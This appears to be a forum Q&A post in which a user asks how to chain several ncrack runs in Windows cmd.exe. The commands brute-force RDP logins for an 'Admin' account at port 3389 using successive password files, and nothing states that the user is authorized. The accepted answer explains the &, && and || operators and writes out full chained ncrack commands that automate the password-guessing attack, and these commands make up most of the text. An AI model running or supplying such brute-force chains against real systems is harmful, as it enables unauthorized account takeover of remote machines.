Windows – How to run multiple commands one after another in cmd


How to run Windows OS cmd.exe multiple commands one after another,
I use ncrack, commands

I manually open cmd.exe and I paste this code:

ncrack --user Admin -P pass1.txt <IPAddress>:3389 -oN good.txt -f

When pass1.txt is finished I paste manually to cmd.exe the second command,
which contains the Pass2.txt etc…:

ncrack --user Admin -P pass2.txt <IPAddress>:3389 -oN good.txt -f

then I paste manually to cmd, Pass.3txt

ncrack --user Admin -P pass3.txt <IPAddress>:3389 -oN good.txt -f

How can I run all  commands automatically in a batch file, one after
another and not all at the same time?

Best Answer

Run multiple commands one after another in cmd

Try using the conditional execution & or the && between each command either with a copy and paste into the cmd.exe window or in a batch file.

Additionally, you can use the double pipe || symbols instead to only run the next command if the previous command failed.

Execute command2 after execution of command1 has finished

ncrack --user Admin -P pass1.txt <IPAddress>:3389 -oN good.txt -f & ncrack --user Admin -P pass2.txt <IPAddress>:3389 -oN good.txt -f & ncrack --user Admin -P pass3.txt <IPAddress>:3389 -oN good.txt -f

Execute command2 only if execution of command1 has finished successfully

ncrack --user Admin -P pass1.txt <IPAddress>:3389 -oN good.txt -f && ncrack --user Admin -P pass2.txt <IPAddress>:3389 -oN good.txt -f && ncrack --user Admin -P pass3.txt <IPAddress>:3389 -oN good.txt -f

Execute command2 only if execution of command1 has finished unsuccessfully

ncrack --user Admin -P pass1.txt <IPAddress>:3389 -oN good.txt -f || ncrack --user Admin -P pass2.txt <IPAddress>:3389 -oN good.txt -f || ncrack --user Admin -P pass3.txt <IPAddress>:3389 -oN good.txt -f

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